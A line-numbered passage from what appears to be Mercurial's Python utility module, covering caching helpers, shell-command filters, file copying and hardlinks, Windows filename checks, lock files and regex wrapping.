1241 | def f(*args): |
|
|||
1242 | if args not in cache: |
|
|||
1243 | if len(cache) > 20: |
|
|||
1244 | del cache[order.popleft()] |
|
|||
1245 | cache[args] = func(*args) |
|
|||
1246 | else: |
|
|||
1247 | order.remove(args) |
|
|||
1248 | order.append(args) |
|
|||
1249 | return cache[args] |
|
|||
1250 |
|
||||
1251 | return f |
|
|||
1252 |
|
||||
1253 | class propertycache(object): |
|
|||
1254 | def __init__(self, func): |
|
|||
1255 | self.func = func |
|
|||
1256 | self.name = func.__name__ |
|
|||
1257 | def __get__(self, obj, type=None): |
|
|||
1258 | result = self.func(obj) |
|
|||
1259 | self.cachevalue(obj, result) |
|
|||
1260 | return result |
|
|||
1261 |
|
||||
1262 | def cachevalue(self, obj, value): |
|
|||
1263 | # __dict__ assignment required to bypass __setattr__ (eg: repoview) |
|
|||
1264 | obj.__dict__[self.name] = value |
|
|||
1265 |
|
||||
1266 | def clearcachedproperty(obj, prop): |
|
|||
1267 | '''clear a cached property value, if one has been set''' |
|
|||
1268 | if prop in obj.__dict__: |
|
|||
1269 | del obj.__dict__[prop] |
|
|||
1270 |
|
||||
1271 | def pipefilter(s, cmd): |
|
|||
1272 | '''filter string S through command CMD, returning its output''' |
|
|||
1273 | p = subprocess.Popen(cmd, shell=True, close_fds=closefds, |
|
|||
1274 | stdin=subprocess.PIPE, stdout=subprocess.PIPE) |
|
|||
1275 | pout, perr = p.communicate(s) |
|
|||
1276 | return pout |
|
|||
1277 |
|
||||
1278 | def tempfilter(s, cmd): |
|
|||
1279 | '''filter string S through a pair of temporary files with CMD. |
|
|||
1280 | CMD is used as a template to create the real command to be run, |
|
|||
1281 | with the strings INFILE and OUTFILE replaced by the real names of |
|
|||
1282 | the temporary files generated.''' |
|
|||
1283 | inname, outname = None, None |
|
|||
1284 | try: |
|
|||
1285 | infd, inname = tempfile.mkstemp(prefix='hg-filter-in-') |
|
|||
1286 | fp = os.fdopen(infd, pycompat.sysstr('wb')) |
|
|||
1287 | fp.write(s) |
|
|||
1288 | fp.close() |
|
|||
1289 | outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-') |
|
|||
1290 | os.close(outfd) |
|
|||
1291 | cmd = cmd.replace('INFILE', inname) |
|
|||
1292 | cmd = cmd.replace('OUTFILE', outname) |
|
|||
1293 | code = os.system(cmd) |
|
|||
1294 | if pycompat.sysplatform == 'OpenVMS' and code & 1: |
|
|||
1295 | code = 0 |
|
|||
1296 | if code: |
|
|||
1297 | raise Abort(_("command '%s' failed: %s") % |
|
|||
1298 | (cmd, explainexit(code))) |
|
|||
1299 | return readfile(outname) |
|
|||
1300 | finally: |
|
|||
1301 | try: |
|
|||
1302 | if inname: |
|
|||
1303 | os.unlink(inname) |
|
|||
1304 | except OSError: |
|
|||
1305 | pass |
|
|||
1306 | try: |
|
|||
1307 | if outname: |
|
|||
1308 | os.unlink(outname) |
|
|||
1309 | except OSError: |
|
|||
1310 | pass |
|
|||
1311 |
|
||||
1312 | filtertable = { |
|
|||
1313 | 'tempfile:': tempfilter, |
|
|||
1314 | 'pipe:': pipefilter, |
|
|||
1315 | } |
|
|||
1316 |
|
||||
1317 | def filter(s, cmd): |
|
|||
1318 | "filter a string through a command that transforms its input to its output" |
|
|||
1319 | for name, fn in filtertable.iteritems(): |
|
|||
1320 | if cmd.startswith(name): |
|
|||
1321 | return fn(s, cmd[len(name):].lstrip()) |
|
|||
1322 | return pipefilter(s, cmd) |
|
|||
1323 |
|
||||
1324 | def binary(s): |
|
|||
1325 | """return true if a string is binary data""" |
|
|||
1326 | return bool(s and '\0' in s) |
|
|||
1327 |
|
||||
1328 | def increasingchunks(source, min=1024, max=65536): |
|
|||
1329 | '''return no less than min bytes per chunk while data remains, |
|
|||
1330 | doubling min after each chunk until it reaches max''' |
|
|||
1331 | def log2(x): |
|
|||
1332 | if not x: |
|
|||
1333 | return 0 |
|
|||
1334 | i = 0 |
|
|||
1335 | while x: |
|
|||
1336 | x >>= 1 |
|
|||
1337 | i += 1 |
|
|||
1338 | return i - 1 |
|
|||
1339 |
|
||||
1340 | buf = [] |
|
|||
1341 | blen = 0 |
|
|||
1342 | for chunk in source: |
|
|||
1343 | buf.append(chunk) |
|
|||
1344 | blen += len(chunk) |
|
|||
1345 | if blen >= min: |
|
|||
1346 | if min < max: |
|
|||
1347 | min = min << 1 |
|
|||
1348 | nmin = 1 << log2(blen) |
|
|||
1349 | if nmin > min: |
|
|||
1350 | min = nmin |
|
|||
1351 | if min > max: |
|
|||
1352 | min = max |
|
|||
1353 | yield ''.join(buf) |
|
|||
1354 | blen = 0 |
|
|||
1355 | buf = [] |
|
|||
1356 | if buf: |
|
|||
1357 | yield ''.join(buf) |
|
|||
1358 |
|
||||
1359 | Abort = error.Abort |
|
|||
1360 |
|
||||
1361 | def always(fn): |
|
|||
1362 | return True |
|
|||
1363 |
|
||||
1364 | def never(fn): |
|
|||
1365 | return False |
|
|||
1366 |
|
||||
1367 | def nogc(func): |
|
|||
1368 | """disable garbage collector |
|
|||
1369 |
|
||||
1370 | Python's garbage collector triggers a GC each time a certain number of |
|
|||
1371 | container objects (the number being defined by gc.get_threshold()) are |
|
|||
1372 | allocated even when marked not to be tracked by the collector. Tracking has |
|
|||
1373 | no effect on when GCs are triggered, only on what objects the GC looks |
|
|||
1374 | into. As a workaround, disable GC while building complex (huge) |
|
|||
1375 | containers. |
|
|||
1376 |
|
||||
1377 | This garbage collector issue have been fixed in 2.7. But it still affect |
|
|||
1378 | CPython's performance. |
|
|||
1379 | """ |
|
|||
1380 | def wrapper(*args, **kwargs): |
|
|||
1381 | gcenabled = gc.isenabled() |
|
|||
1382 | gc.disable() |
|
|||
1383 | try: |
|
|||
1384 | return func(*args, **kwargs) |
|
|||
1385 | finally: |
|
|||
1386 | if gcenabled: |
|
|||
1387 | gc.enable() |
|
|||
1388 | return wrapper |
|
|||
1389 |
|
||||
1390 | if pycompat.ispypy: |
|
|||
1391 | # PyPy runs slower with gc disabled |
|
|||
1392 | nogc = lambda x: x |
|
|||
1393 |
|
||||
1394 | def pathto(root, n1, n2): |
|
|||
1395 | '''return the relative path from one place to another. |
|
|||
1396 | root should use os.sep to separate directories |
|
|||
1397 | n1 should use os.sep to separate directories |
|
|||
1398 | n2 should use "/" to separate directories |
|
|||
1399 | returns an os.sep-separated path. |
|
|||
1400 |
|
||||
1401 | If n1 is a relative path, it's assumed it's |
|
|||
1402 | relative to root. |
|
|||
1403 | n2 should always be relative to root. |
|
|||
1404 | ''' |
|
|||
1405 | if not n1: |
|
|||
1406 | return localpath(n2) |
|
|||
1407 | if os.path.isabs(n1): |
|
|||
1408 | if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]: |
|
|||
1409 | return os.path.join(root, localpath(n2)) |
|
|||
1410 | n2 = '/'.join((pconvert(root), n2)) |
|
|||
1411 | a, b = splitpath(n1), n2.split('/') |
|
|||
1412 | a.reverse() |
|
|||
1413 | b.reverse() |
|
|||
1414 | while a and b and a[-1] == b[-1]: |
|
|||
1415 | a.pop() |
|
|||
1416 | b.pop() |
|
|||
1417 | b.reverse() |
|
|||
1418 | return pycompat.ossep.join((['..'] * len(a)) + b) or '.' |
|
|||
1419 |
|
||||
1420 | def mainfrozen(): |
|
|||
1421 | """return True if we are a frozen executable. |
|
|||
1422 |
|
||||
1423 | The code supports py2exe (most common, Windows only) and tools/freeze |
|
|||
1424 | (portable, not much used). |
|
|||
1425 | """ |
|
|||
1426 | return (safehasattr(sys, "frozen") or # new py2exe |
|
|||
1427 | safehasattr(sys, "importers") or # old py2exe |
|
|||
1428 | imp.is_frozen(u"__main__")) # tools/freeze |
|
|||
1429 |
|
||||
1430 | # the location of data files matching the source code |
|
|||
1431 | if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app': |
|
|||
1432 | # executable version (py2exe) doesn't support __file__ |
|
|||
1433 | datapath = os.path.dirname(pycompat.sysexecutable) |
|
|||
1434 | else: |
|
|||
1435 | datapath = os.path.dirname(pycompat.fsencode(__file__)) |
|
|||
1436 |
|
||||
1437 | i18n.setdatapath(datapath) |
|
|||
1438 |
|
||||
1439 | _hgexecutable = None |
|
|||
1440 |
|
||||
1441 | def hgexecutable(): |
|
|||
1442 | """return location of the 'hg' executable. |
|
|||
1443 |
|
||||
1444 | Defaults to $HG or 'hg' in the search path. |
|
|||
1445 | """ |
|
|||
1446 | if _hgexecutable is None: |
|
|||
1447 | hg = encoding.environ.get('HG') |
|
|||
1448 | mainmod = sys.modules[pycompat.sysstr('__main__')] |
|
|||
1449 | if hg: |
|
|||
1450 | _sethgexecutable(hg) |
|
|||
1451 | elif mainfrozen(): |
|
|||
1452 | if getattr(sys, 'frozen', None) == 'macosx_app': |
|
|||
1453 | # Env variable set by py2app |
|
|||
1454 | _sethgexecutable(encoding.environ['EXECUTABLEPATH']) |
|
|||
1455 | else: |
|
|||
1456 | _sethgexecutable(pycompat.sysexecutable) |
|
|||
1457 | elif (os.path.basename( |
|
|||
1458 | pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'): |
|
|||
1459 | _sethgexecutable(pycompat.fsencode(mainmod.__file__)) |
|
|||
1460 | else: |
|
|||
1461 | exe = findexe('hg') or os.path.basename(sys.argv[0]) |
|
|||
1462 | _sethgexecutable(exe) |
|
|||
1463 | return _hgexecutable |
|
|||
1464 |
|
||||
1465 | def _sethgexecutable(path): |
|
|||
1466 | """set location of the 'hg' executable""" |
|
|||
1467 | global _hgexecutable |
|
|||
1468 | _hgexecutable = path |
|
|||
1469 |
|
||||
1470 | def _isstdout(f): |
|
|||
1471 | fileno = getattr(f, 'fileno', None) |
|
|||
1472 | try: |
|
|||
1473 | return fileno and fileno() == sys.__stdout__.fileno() |
|
|||
1474 | except io.UnsupportedOperation: |
|
|||
1475 | return False # fileno() raised UnsupportedOperation |
|
|||
1476 |
|
||||
1477 | def shellenviron(environ=None): |
|
|||
1478 | """return environ with optional override, useful for shelling out""" |
|
|||
1479 | def py2shell(val): |
|
|||
1480 | 'convert python object into string that is useful to shell' |
|
|||
1481 | if val is None or val is False: |
|
|||
1482 | return '0' |
|
|||
1483 | if val is True: |
|
|||
1484 | return '1' |
|
|||
1485 | return pycompat.bytestr(val) |
|
|||
1486 | env = dict(encoding.environ) |
|
|||
1487 | if environ: |
|
|||
1488 | env.update((k, py2shell(v)) for k, v in environ.iteritems()) |
|
|||
1489 | env['HG'] = hgexecutable() |
|
|||
1490 | return env |
|
|||
1491 |
|
||||
1492 | def system(cmd, environ=None, cwd=None, out=None): |
|
|||
1493 | '''enhanced shell command execution. |
|
|||
1494 | run with environment maybe modified, maybe in different dir. |
|
|||
1495 |
|
||||
1496 | if out is specified, it is assumed to be a file-like object that has a |
|
|||
1497 | write() method. stdout and stderr will be redirected to out.''' |
|
|||
1498 | try: |
|
|||
1499 | stdout.flush() |
|
|||
1500 | except Exception: |
|
|||
1501 | pass |
|
|||
1502 | cmd = quotecommand(cmd) |
|
|||
1503 | env = shellenviron(environ) |
|
|||
1504 | if out is None or _isstdout(out): |
|
|||
1505 | rc = subprocess.call(cmd, shell=True, close_fds=closefds, |
|
|||
1506 | env=env, cwd=cwd) |
|
|||
1507 | else: |
|
|||
1508 | proc = subprocess.Popen(cmd, shell=True, close_fds=closefds, |
|
|||
1509 | env=env, cwd=cwd, stdout=subprocess.PIPE, |
|
|||
1510 | stderr=subprocess.STDOUT) |
|
|||
1511 | for line in iter(proc.stdout.readline, ''): |
|
|||
1512 | out.write(line) |
|
|||
1513 | proc.wait() |
|
|||
1514 | rc = proc.returncode |
|
|||
1515 | if pycompat.sysplatform == 'OpenVMS' and rc & 1: |
|
|||
1516 | rc = 0 |
|
|||
1517 | return rc |
|
|||
1518 |
|
||||
1519 | def checksignature(func): |
|
|||
1520 | '''wrap a function with code to check for calling errors''' |
|
|||
1521 | def check(*args, **kwargs): |
|
|||
1522 | try: |
|
|||
1523 | return func(*args, **kwargs) |
|
|||
1524 | except TypeError: |
|
|||
1525 | if len(traceback.extract_tb(sys.exc_info()[2])) == 1: |
|
|||
1526 | raise error.SignatureError |
|
|||
1527 | raise |
|
|||
1528 |
|
||||
1529 | return check |
|
|||
1530 |
|
||||
1531 | # a whilelist of known filesystems where hardlink works reliably |
|
|||
1532 | _hardlinkfswhitelist = { |
|
|||
1533 | 'btrfs', |
|
|||
1534 | 'ext2', |
|
|||
1535 | 'ext3', |
|
|||
1536 | 'ext4', |
|
|||
1537 | 'hfs', |
|
|||
1538 | 'jfs', |
|
|||
1539 | 'NTFS', |
|
|||
1540 | 'reiserfs', |
|
|||
1541 | 'tmpfs', |
|
|||
1542 | 'ufs', |
|
|||
1543 | 'xfs', |
|
|||
1544 | 'zfs', |
|
|||
1545 | } |
|
|||
1546 |
|
||||
1547 | def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False): |
|
|||
1548 | '''copy a file, preserving mode and optionally other stat info like |
|
|||
1549 | atime/mtime |
|
|||
1550 |
|
||||
1551 | checkambig argument is used with filestat, and is useful only if |
|
|||
1552 | destination file is guarded by any lock (e.g. repo.lock or |
|
|||
1553 | repo.wlock). |
|
|||
1554 |
|
||||
1555 | copystat and checkambig should be exclusive. |
|
|||
1556 | ''' |
|
|||
1557 | assert not (copystat and checkambig) |
|
|||
1558 | oldstat = None |
|
|||
1559 | if os.path.lexists(dest): |
|
|||
1560 | if checkambig: |
|
|||
1561 | oldstat = checkambig and filestat.frompath(dest) |
|
|||
1562 | unlink(dest) |
|
|||
1563 | if hardlink: |
|
|||
1564 | # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks |
|
|||
1565 | # unless we are confident that dest is on a whitelisted filesystem. |
|
|||
1566 | try: |
|
|||
1567 | fstype = getfstype(os.path.dirname(dest)) |
|
|||
1568 | except OSError: |
|
|||
1569 | fstype = None |
|
|||
1570 | if fstype not in _hardlinkfswhitelist: |
|
|||
1571 | hardlink = False |
|
|||
1572 | if hardlink: |
|
|||
1573 | try: |
|
|||
1574 | oslink(src, dest) |
|
|||
1575 | return |
|
|||
1576 | except (IOError, OSError): |
|
|||
1577 | pass # fall back to normal copy |
|
|||
1578 | if os.path.islink(src): |
|
|||
1579 | os.symlink(os.readlink(src), dest) |
|
|||
1580 | # copytime is ignored for symlinks, but in general copytime isn't needed |
|
|||
1581 | # for them anyway |
|
|||
1582 | else: |
|
|||
1583 | try: |
|
|||
1584 | shutil.copyfile(src, dest) |
|
|||
1585 | if copystat: |
|
|||
1586 | # copystat also copies mode |
|
|||
1587 | shutil.copystat(src, dest) |
|
|||
1588 | else: |
|
|||
1589 | shutil.copymode(src, dest) |
|
|||
1590 | if oldstat and oldstat.stat: |
|
|||
1591 | newstat = filestat.frompath(dest) |
|
|||
1592 | if newstat.isambig(oldstat): |
|
|||
1593 | # stat of copied file is ambiguous to original one |
|
|||
1594 | advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff |
|
|||
1595 | os.utime(dest, (advanced, advanced)) |
|
|||
1596 | except shutil.Error as inst: |
|
|||
1597 | raise Abort(str(inst)) |
|
|||
1598 |
|
||||
1599 | def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None): |
|
|||
1600 | """Copy a directory tree using hardlinks if possible.""" |
|
|||
1601 | num = 0 |
|
|||
1602 |
|
||||
1603 | gettopic = lambda: hardlink and _('linking') or _('copying') |
|
|||
1604 |
|
||||
1605 | if os.path.isdir(src): |
|
|||
1606 | if hardlink is None: |
|
|||
1607 | hardlink = (os.stat(src).st_dev == |
|
|||
1608 | os.stat(os.path.dirname(dst)).st_dev) |
|
|||
1609 | topic = gettopic() |
|
|||
1610 | os.mkdir(dst) |
|
|||
1611 | for name, kind in listdir(src): |
|
|||
1612 | srcname = os.path.join(src, name) |
|
|||
1613 | dstname = os.path.join(dst, name) |
|
|||
1614 | def nprog(t, pos): |
|
|||
1615 | if pos is not None: |
|
|||
1616 | return progress(t, pos + num) |
|
|||
1617 | hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog) |
|
|||
1618 | num += n |
|
|||
1619 | else: |
|
|||
1620 | if hardlink is None: |
|
|||
1621 | hardlink = (os.stat(os.path.dirname(src)).st_dev == |
|
|||
1622 | os.stat(os.path.dirname(dst)).st_dev) |
|
|||
1623 | topic = gettopic() |
|
|||
1624 |
|
||||
1625 | if hardlink: |
|
|||
1626 | try: |
|
|||
1627 | oslink(src, dst) |
|
|||
1628 | except (IOError, OSError): |
|
|||
1629 | hardlink = False |
|
|||
1630 | shutil.copy(src, dst) |
|
|||
1631 | else: |
|
|||
1632 | shutil.copy(src, dst) |
|
|||
1633 | num += 1 |
|
|||
1634 | progress(topic, num) |
|
|||
1635 | progress(topic, None) |
|
|||
1636 |
|
||||
1637 | return hardlink, num |
|
|||
1638 |
|
||||
1639 | _winreservednames = { |
|
|||
1640 | 'con', 'prn', 'aux', 'nul', |
|
|||
1641 | 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9', |
|
|||
1642 | 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9', |
|
|||
1643 | } |
|
|||
1644 | _winreservedchars = ':*?"<>|' |
|
|||
1645 | def checkwinfilename(path): |
|
|||
1646 | r'''Check that the base-relative path is a valid filename on Windows. |
|
|||
1647 | Returns None if the path is ok, or a UI string describing the problem. |
|
|||
1648 |
|
||||
1649 | >>> checkwinfilename(b"just/a/normal/path") |
|
|||
1650 | >>> checkwinfilename(b"foo/bar/con.xml") |
|
|||
1651 | "filename contains 'con', which is reserved on Windows" |
|
|||
1652 | >>> checkwinfilename(b"foo/con.xml/bar") |
|
|||
1653 | "filename contains 'con', which is reserved on Windows" |
|
|||
1654 | >>> checkwinfilename(b"foo/bar/xml.con") |
|
|||
1655 | >>> checkwinfilename(b"foo/bar/AUX/bla.txt") |
|
|||
1656 | "filename contains 'AUX', which is reserved on Windows" |
|
|||
1657 | >>> checkwinfilename(b"foo/bar/bla:.txt") |
|
|||
1658 | "filename contains ':', which is reserved on Windows" |
|
|||
1659 | >>> checkwinfilename(b"foo/bar/b\07la.txt") |
|
|||
1660 | "filename contains '\\x07', which is invalid on Windows" |
|
|||
1661 | >>> checkwinfilename(b"foo/bar/bla ") |
|
|||
1662 | "filename ends with ' ', which is not allowed on Windows" |
|
|||
1663 | >>> checkwinfilename(b"../bar") |
|
|||
1664 | >>> checkwinfilename(b"foo\\") |
|
|||
1665 | "filename ends with '\\', which is invalid on Windows" |
|
|||
1666 | >>> checkwinfilename(b"foo\\/bar") |
|
|||
1667 | "directory name ends with '\\', which is invalid on Windows" |
|
|||
1668 | ''' |
|
|||
1669 | if path.endswith('\\'): |
|
|||
1670 | return _("filename ends with '\\', which is invalid on Windows") |
|
|||
1671 | if '\\/' in path: |
|
|||
1672 | return _("directory name ends with '\\', which is invalid on Windows") |
|
|||
1673 | for n in path.replace('\\', '/').split('/'): |
|
|||
1674 | if not n: |
|
|||
1675 | continue |
|
|||
1676 | for c in _filenamebytestr(n): |
|
|||
1677 | if c in _winreservedchars: |
|
|||
1678 | return _("filename contains '%s', which is reserved " |
|
|||
1679 | "on Windows") % c |
|
|||
1680 | if ord(c) <= 31: |
|
|||
1681 | return _("filename contains '%s', which is invalid " |
|
|||
1682 | "on Windows") % escapestr(c) |
|
|||
1683 | base = n.split('.')[0] |
|
|||
1684 | if base and base.lower() in _winreservednames: |
|
|||
1685 | return _("filename contains '%s', which is reserved " |
|
|||
1686 | "on Windows") % base |
|
|||
1687 | t = n[-1:] |
|
|||
1688 | if t in '. ' and n not in '..': |
|
|||
1689 | return _("filename ends with '%s', which is not allowed " |
|
|||
1690 | "on Windows") % t |
|
|||
1691 |
|
||||
1692 | if pycompat.iswindows: |
|
|||
1693 | checkosfilename = checkwinfilename |
|
|||
1694 | timer = time.clock |
|
|||
1695 | else: |
|
|||
1696 | checkosfilename = platform.checkosfilename |
|
|||
1697 | timer = time.time |
|
|||
1698 |
|
||||
1699 | if safehasattr(time, "perf_counter"): |
|
|||
1700 | timer = time.perf_counter |
|
|||
1701 |
|
||||
1702 | def makelock(info, pathname): |
|
|||
1703 | try: |
|
|||
1704 | return os.symlink(info, pathname) |
|
|||
1705 | except OSError as why: |
|
|||
1706 | if why.errno == errno.EEXIST: |
|
|||
1707 | raise |
|
|||
1708 | except AttributeError: # no symlink in os |
|
|||
1709 | pass |
|
|||
1710 |
|
||||
1711 | ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL) |
|
|||
1712 | os.write(ld, info) |
|
|||
1713 | os.close(ld) |
|
|||
1714 |
|
||||
1715 | def readlock(pathname): |
|
|||
1716 | try: |
|
|||
1717 | return os.readlink(pathname) |
|
|||
1718 | except OSError as why: |
|
|||
1719 | if why.errno not in (errno.EINVAL, errno.ENOSYS): |
|
|||
1720 | raise |
|
|||
1721 | except AttributeError: # no symlink in os |
|
|||
1722 | pass |
|
|||
1723 | fp = posixfile(pathname) |
|
|||
1724 | r = fp.read() |
|
|||
1725 | fp.close() |
|
|||
1726 | return r |
|
|||
1727 |
|
||||
1728 | def fstat(fp): |
|
|||
1729 | '''stat file object that may not have fileno method.''' |
|
|||
1730 | try: |
|
|||
1731 | return os.fstat(fp.fileno()) |
|
|||
1732 | except AttributeError: |
|
|||
1733 | return os.stat(fp.name) |
|
|||
1734 |
|
||||
1735 | # File system features |
|
|||
1736 |
|
||||
1737 | def fscasesensitive(path): |
|
|||
1738 | """ |
|
|||
1739 | Return true if the given path is on a case-sensitive filesystem |
|
|||
1740 |
|
||||
1741 | Requires a path (like /foo/.hg) ending with a foldable final |
|
|||
1742 | directory component. |
|
|||
1743 | """ |
|
|||
1744 | s1 = os.lstat(path) |
|
|||
1745 | d, b = os.path.split(path) |
|
|||
1746 | b2 = b.upper() |
|
|||
1747 | if b == b2: |
|
|||
1748 | b2 = b.lower() |
|
|||
1749 | if b == b2: |
|
|||
1750 | return True # no evidence against case sensitivity |
|
|||
1751 | p2 = os.path.join(d, b2) |
|
|||
1752 | try: |
|
|||
1753 | s2 = os.lstat(p2) |
|
|||
1754 | if s2 == s1: |
|
|||
1755 | return False |
|
|||
1756 | return True |
|
|||
1757 | except OSError: |
|
|||
1758 | return True |
|
|||
1759 |
|
||||
1760 | try: |
|
|||
1761 | import re2 |
|
|||
1762 | _re2 = None |
|
|||
1763 | except ImportError: |
|
|||
1764 | _re2 = False |
|
|||
1765 |
|
||||
1766 | class _re(object): |
|
|||
1767 | def _checkre2(self): |
|
|||
1768 | global _re2 |
|
|||
1769 | try: |
|
|||
1770 | # check if match works, see issue3964 |
|
|||
1771 | _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]')) |
|
|||
1772 | except ImportError: |
|
|||
1773 | _re2 = False |
|
|||
1774 |
|
||||
1775 | def compile(self, pat, flags=0): |
|
|||
1776 | '''Compile a regular expression, using re2 if possible |
|
|||
1777 |
|
||||
1778 | For best performance, use only re2-compatible regexp features. The |
|
|||
1779 | only flags from the re module that are re2-compatible are |
|
|||
1780 | IGNORECASE and MULTILINE.''' |
|
|||
1781 | if _re2 is None: |
|
|||
1782 | self._checkre2() |
|
|||
1783 | if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0: |
|
|||
1784 | if flags & remod.IGNORECASE: |
|
|||
1785 | pat = '(?i)' + pat |
|
|||
1786 | if flags & remod.MULTILINE: |
|
|||
1787 | pat = '(?m)' + pat |
|
|||
1788 | try: |
|
|||
1789 | return re2.compile(pat) |
|
|||
1790 | except re2.error: |
|
|||
1791 | pass |
|
|||
1792 | return remod.compile(pat, flags) |
|
|||
1793 |
|
||||
1794 | @propertycache |
|
|||
1795 | def escape(self): |
|
|||
1796 | '''Return the version of escape corresponding to self.compile. |
|
|||
1797 |
|
||||
1798 | This is imperfect because whether re2 or re is used for a particular |
|
|||
1799 | function depends on the flags, etc, but it's the best we can do. |
|
|||
1800 | ''' |
|
|||
1801 | global _re2 |
|
|||
1802 | if _re2 is None: |
|
|||
1803 | self._checkre2() |
|
|||
1804 | if _re2: |
|
|||
1805 | return re2.escape |
|
|||
1806 | else: |
|
|||
1807 | return remod.escape |
|
|||
1808 |
|
||||
1809 | re = _re() |
|
|||
1810 |
|
||||
1811 | _fspathcache = {} |
|
|||
1812 | def fspath(name, root): |
|
|||
1813 | '''Get name in the case stored in the filesystem |
|
|||
1814 |
|
||||
1815 | The name should be relative to root, and be normcase-ed for efficiency. |
|
|||
1816 |
|
||||
1817 | Note that this function is unnecessary, and should not be |
|
|||
1818 | called, for case-sensitive filesystems (simply because it's expensive). |
|
|||
1819 |
|
||||
1820 | The root should be normcase-ed, too. |
|
|||
1821 | ''' |
|
|||
1822 | def _makefspathcacheentry(dir): |
|
|||
1823 | return dict((normcase(n), n) for n in os.listdir(dir)) |
|
|||
1824 |
|
||||
1825 | seps = pycompat.ossep |
|
|||
1826 | if pycompat.osaltsep: |
|
|||
1827 | seps = seps + pycompat.osaltsep |
|
|||
1828 | # Protect backslashes. This gets silly very quickly. |
|
|||
1829 | seps.replace('\\','\\\\') |
|
|||
1830 | pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps)) |
|
|||
1831 | dir = os.path.normpath(root) |
|
|||
1832 | result = [] |
|
|||
1833 | for part, sep in pattern.findall(name): |
|
|||
1834 | if sep: |
|
|||
1835 | result.append(sep) |
|
|||
1836 | continue |
|
|||
1837 |
|
||||
1838 | if dir not in _fspathcache: |
|
|||
1839 | _fspathcache[dir] = _makefspathcacheentry(dir) |
|
|||
1840 | contents = _fspathcache[dir] |
|
|||
1841 |
|
||||
1842 | found = contents.get(part) |
|
|||
1843 | if not found: |
|
|||
1844 | # retry "once per directory" per "dirstate.walk" which |
|
|||
1845 | # may take place for each patches of "hg qpush", for example |
|
|||
1846 | _fspathcache[dir] = contents = _makefspathcacheentry(dir) |
|
|||
1847 | found = contents.get(part) |
|
|||
1848 |
|
||||
1849 | result.append(found or part) |
|
|||
1850 | dir = os.path.join(dir, part) |
|
|||
1851 |
|
||||
1852 | return ''.join(result) |
|
|||
1853 |
|
||||
1854 | def checknlink(testfile): |
|
|||
1855 | '''check whether hardlink count reporting works properly''' |
|
|||
1856 |
|
||||
1857 | # testfile may be open, so we need a separate file for checking to |
|
|||
1858 | # work around issue2543 (or testfile may get lost on Samba shares) |
|
|||
1859 | f1, f2, fp = None, None, None |
|
|||
1860 | try: |
|
|||
1861 | fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile), |
|
|||
1862 | suffix='1~', dir=os.path.dirname(testfile)) |
|
|||
1863 | os.close(fd) |
|
|||
1864 | f2 = '%s2~' % f1[:-2] |
|
|||
1865 |
|
||||
1866 | oslink(f1, f2) |
|
|||
1867 | # nlinks() may behave differently for files on Windows shares if |
|
|||
1868 | # the file is open. |
|
|||
1869 | fp = posixfile(f2) |
|
|||
1870 | return nlinks(f2) > 1 |
|
|||
1871 | except OSError: |
|
|||
1872 | return False |
|
|||
1873 | finally: |
|
|||
1874 | if fp is not None: |
|
|||
1875 | fp.close() |
|
|||
1876 | for f in (f1, f2): |
|
|||
1877 | try: |
|
|||
1878 | if f is not None: |
|
|||
1879 | os.unlink(f) |
|
|||
1880 | except OSError: |
|
|||
1881 | pass |
|
|||
1882 |
|
||||
1883 | def endswithsep(path): |
|
|||
1884 | '''Check path ends with os.sep or os.altsep.''' |
|
|||
1885 | return (path.endswith(pycompat.ossep) |
|
|||
1886 | or pycompat.osaltsep and path.endswith(pycompat.osaltsep)) |
|
|||
1887 |
|
||||
1888 | def splitpath(path): |
|
|||
1889 | '''Split path by os.sep. |
|
|||
1890 | Note that this function does not use os.altsep because this is |
|
|||
1891 | an alternative of simple "xxx.split(os.sep)". |
|
|||
1892 | It is recommended to use os.path.normpath() before using this |
|
|||
1893 | function if need.''' |
|
|||
1894 | return path.split(pycompat.ossep) |
|
|||
1895 |
|
||||
1896 | def gui(): |
|
|||
1897 | '''Are we running in a GUI?''' |
|
|||
1898 | if pycompat.isdarwin: |
|
|||
1899 | if 'SSH_CONNECTION' in encoding.environ: |
|
|||
1900 | # handle SSH access to a box where the user is logged in |
|
|||
1901 | return False |
|
|||
1902 | elif getattr(osutil, 'isgui', None): |
|
|||
1903 | # check if a CoreGraphics session is available |
|
|||
1904 | return osutil.isgui() |
|
|||
1905 | else: |
|
|||
1906 | # pure build; use a safe default |
|
|||
1907 | return True |
|
|||
1908 | else: |
|
|||
1909 | return pycompat.iswindows or encoding.environ.get("DISPLAY") |
|
|||
1910 |
|
||||
1911 | def mktempcopy(name, emptyok=False, createmode=None): |
|
|||
1912 | """Create a temporary file with the same contents from name |
|
|||
1913 |
|
||||
1914 | The permission bits are copied from the original file. |
|
|||
1915 |
|
||||
1916 | If the temporary file is going to be truncated immediately, you |
|
|||
1917 | can use emptyok=True as an optimization. |
|
|||
1918 |
|
||||
1919 | Returns the name of the temporary file. |
|
|||
1920 | """ |
|
|||
1921 | d, fn = os.path.split(name) |
|
|||
1922 | fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d) |
|
|||
1923 | os.close(fd) |
|
|||
1924 | # Temporary files are created with mode 0600, which is usually not |
|
|||
1925 | # what we want. If the original file already exists, just copy |
|
|||
1926 | # its mode. Otherwise, manually obey umask. |
|
|||
1927 | copymode(name, temp, createmode) |
|
|||
1928 | if emptyok: |
|
|||
1929 | return temp |
|
|||
1930 | try: |
|
|||
1931 | try: |
|
|||
1932 | ifp = posixfile(name, "rb") |
|
|||
1933 | except IOError as inst: |
|
|||
1934 | if inst.errno == errno.ENOENT: |
|
|||
1935 | return temp |
|
|||
1936 | if not getattr(inst, 'filename', None): |
|
|||
